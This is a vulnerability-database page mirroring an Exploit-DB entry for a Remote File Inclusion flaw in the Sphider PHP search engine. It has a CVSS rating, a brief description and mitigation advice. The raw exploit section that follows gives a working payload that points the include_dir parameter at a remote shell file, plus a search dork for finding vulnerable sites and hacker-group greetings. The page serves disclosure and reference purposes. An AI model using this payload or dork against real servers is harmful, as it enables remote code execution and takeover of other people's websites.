header-logo
Suggest Exploit
vendor:
sphider
by:
Li0n-PaL sTiLL Str1k3z y0u!!
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: sphider
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

sphider Remote File Inclusion

Sphider is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute arbitrary code. This can be exploited to gain access to the server or to execute malicious code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. Additionally, it is important to ensure that the web server is configured to only allow access to files that are necessary for the application to function.
Source

Exploit-DB raw data:

--##----------##------######--------------------------------########----------------##--------|
--##----------------##------##------------------------------##------##--------------##--------|
--##----------##----##------##----##--####------------------##------##--######------##--------|
--##----------##----##------##----####----##----------------##------##--------##----##--------|
--##----------##----##------##----##------##----########----########------######----##--------|
--##----------##----##------##----##------##----------------##----------##----##----##--------|
--##----------##----##------##----##------##----Li0n-PaL----##----------##----##----##--------|
--##########--##------######------##------##-sTiLL Str1k3z--##------------########--##########|
--------------------------------------------------y0u------------------------------------------|
====================================================================================+
[~] #sphider Remote File inclusion  
====================================================================================+|
                                                                                     |
                              Li0n-PaL sTiLL Str1k3z y0u!!                          |
                                                                                     |   
+===================================================================================+|
[?] sphider Remote File inclusion                                                  |
+===================================================================================+
    [?] My h0m3:              [http://HaCkTeCh.Org/cc & Pal-Li0n.som           ]
    [?] F0r 4sk:              [ F5w@hotmail.com                                ]
    [?] 5cr1p7:               [ sphider                                        ]
    [?] h0m3 5cr1p7           [ http://www.sphider.eu                          ]
    [?] L4nguage:             [ PHP                                            ]
    [?] F0und3r:              [ Li0n-PaL                                       ]      
    [?] D0rK   :              [ Powered by Sphider                             ]
===[ Expl0it  ]===

RFI #~

  http://localhost/search/?include_dir=[http://localhost/shell.txt???]


Good luCk o_O

---------------------------------------------------------

[?] Gr44tz to:[ Pal-Li0n-[PaL-Li0ns.com]Red-D3v1L-ShaDow-D3v1L-j0rd4n14n.r1z[sec-r1z.com]-Sas-TerrOrisT-Cold z3ro-zAx-SarBot511-Devil Fucker-
Storm-HcJ-ViRuSMaN-VirUs_Hima-PaL-D3v1L-Mr.Safa7-Evil-Cod3r [v4-team]-h3ll c0d3-Mahmoud SQL[Team-SQL.com]-D4rk-Mr.Sc0rpion-All
HacKTeacH.Org MeMbers & Gusts & CreW]


========================
./Li0n-PaL